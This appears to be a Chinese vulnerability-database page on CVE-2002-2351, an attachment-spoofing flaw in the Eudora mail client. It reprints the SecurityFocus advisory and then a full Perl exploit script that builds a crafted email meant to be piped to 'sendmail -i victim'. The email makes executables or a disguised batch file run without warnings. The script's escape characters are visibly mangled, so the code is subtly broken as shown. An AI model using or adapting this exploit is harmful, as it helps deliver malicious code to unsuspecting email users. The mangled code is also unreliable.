Qualcomm Eudora文件附件欺骗漏洞

Qualcomm Eudora文件附件欺骗漏洞

漏洞ID 1106906 漏洞类型 路径遍历
发布时间 2002-08-08 更新时间 2002-12-31
图片[1]-Qualcomm Eudora文件附件欺骗漏洞-安全小百科CVE编号 CVE-2002-2351
图片[2]-Qualcomm Eudora文件附件欺骗漏洞-安全小百科CNNVD-ID CNNVD-200212-459
漏洞平台 Windows CVSS评分 6.4
|漏洞来源
https://www.exploit-db.com/exploits/21696
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-459
|漏洞详情
Eudora5.1版本存在漏洞。远程攻击者借助带有包含尾随”.”(点)名称的附件绕过安全警告且可能执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/5432/info
 
Eudora is reported to be prone to an issue which may allow attackers to spoof the file extension in an attachment. This may aid an attacker in enticing a user of the e-mail client into executing malicious content, and in avoiding generating warning messages.
 
It is possible to refer to other files or attachments in a message through specially formatted inline text. It has been demonstrated possible to misrepresent some aspects of files referenced in this manner. This may cause end users to make erroneous judgements about the nature of file attachments, and allow malicious attachments to bypass normal warning dialogs displayed when executable content is launched.
 
If an attachment path to an executable file has a single '.' character appended, warning messages will not be displayed. Attachments such as 'calc.exe.' may execute when launched without the requirement for further interaction. Additionally, an arbitrary file name may be specified by the attacker which will be displayed to the end user. If a filename such as 'readme.txt' is associated with a malicious, executable attachment, the user may make innacurate decisions about the risk associated with opening the attachment. If the specified file does not exist on the local system, the full path provided will be used to locate and launch a file, with no further warnings given.
 
Successful exploitation may require the attacker to know the full path to the attachment directory.
 
** A new version of Eudora is available however, reports suggest that the new version may still be affected.
 
** May 21, 2004 - Eudora version 6.1.1 has been released, however, it is reported that the new versions is vulnerable to this issue as well.

#!/usr/bin/perl --

use MIME::Base64;

print "From: men";
print "To: youn";
print "Subject: Eudora 6.1.1 on Windows spoof, LaunchProtectn";
print "MIME-Version: 1.0n";
print "Content-Type: multipart/mixed; boundary="zzz"n";
print "X-Use: Pipe the output of this script into:  sendmail -i victimnn";
print "This is a multi-part message in MIME format.n";
print "--zzzn";
print "Content-Type: text/plainn";
print "Content-Transfer-Encoding: 7bitn";
print "n";

print "With spoofed attachments, we could 'steal' files if the message
was forwarded (not replied to).n";

#print "
#(Within plain-text email (or plain-text, inline MIME parts) embedded
#CR=x0d characters used to get converted internally into a NUL=x00 and
#ignored, so we could spoof "attachment converted" lines.
#At version 6.1.1, embedded CR seem to get converted into NL=x0a.)n";

print "nThe <x-xyz></x-xyz> constructs (x-html, x-rich or x-flowed)
allow spoofing attachments easily.
The following work fine (but put up warnings):n";
print "<x-html></x-html>Attachment Converted: "c:\winnt\system32\calc.exe"n";
print "<x-html></x-html>Attachment Converted: c:\winnt\system32\calc.exen";
print "<x-html></x-html>Attachment Converted: <a href=c:/winnt/system32/calc.exe>file.exe</a>n";
print "These have broken icons, but execute without warning:n";
print "<x-html></x-html>Attachment Converted: "c:\winnt\system32\calc"n";
print "<x-html></x-html>Attachment Converted: c:\winnt\system32\calcn";
print "<x-html></x-html>Attachment Converted: <a href=c:/winnt/system32/calc>file</a>n";

print "n<x-html>
With <b>HTML</b> <i>inclusions</i> we can do
<a href=c:/winnt/system32/calc.exe>file.exe</a>
(get warning)
<br>and
<a href=c:/winnt/system32/calc>plain file</a>
(no warning) references.
<br>(Or can do
<a href="http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx">http</a>
and
<a href="javascript:alert(x27hellox27)">javascript</a>
references; the latter
<br>seems to run with IE, regardless of default browser settings.).
</x-html>n";

print "nn<x-rich>
Can also do RTF inclusions. Can that be abused?
</x-rich>nn";

print "n--zzzn";
print "Content-Type: text/plain; name="b64.txt"n";
print "Content-Transfer-Encoding: base64n";
print "Content-Disposition: inline; filename="b64.txt"n";
print "n";
$z = "Can no longer spoof attachments in quoted-printable parts, butr
still can within base64 encoded (plain-text, inline) MIME parts:r
Attachment Converted: "c:\winnt\system32\calc.exe"r
Attachment Converted: "c:\winnt\system32\calc"rn";
print encode_base64($z);

print "n--zzzn";
print "Content-Type: text/plainn";
print "Content-Transfer-Encoding: 7bitn";
print "n";

$X = 'README'; $Y = "$X.bat";
print "nnnThe X - X.exe dichotomy: send a plain $X attachment:n";
$z = "rem Funny jokernpausern";
print "begin 600 $Xn", pack('u',$z), "`nendn";
print "nand (in another message or after some blurb so is scrolled off in
another screenful) also send $Y. Clicking on $X does not
get it any more, but gets $Y and runs without any warning:n";
$z = "rem Big jokernrem Should do something nastyrnpausern";
print "begin 600 $Yn", pack('u',$z), "`nendn";

#print "nIf we can guess the full path to the attach directory then can
#change the name shown to anything we like, but get broken icon:n";
#print "<x-html></x-html>Attachment Converted: attach\READMEn";
#print "<x-html></x-html>Attachment Converted: <a href=H:/windows/.eudora/attach/README>file.txt</a>n";

#print "nFunny: I thought that since version 6.0, LaunchProtect handled
#the X-X.exe dichotomy (in the attach directory only)...n";

print "n";
print "n--zzz--n";
print "n";
|参考资料

来源:BID
名称:5432
链接:http://www.securityfocus.com/bid/5432
来源:www.eudora.com
链接:http://www.eudora.com/download/eudora/windows/5.2/RelNotes.txt

相关推荐: Netscape/Mozilla POP3 Mail Handler Integer Overflow Vulnerability

Netscape/Mozilla POP3 Mail Handler Integer Overflow Vulnerability 漏洞ID 1101242 漏洞类型 Boundary Condition Error 发布时间 2002-11-26 更新时间 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享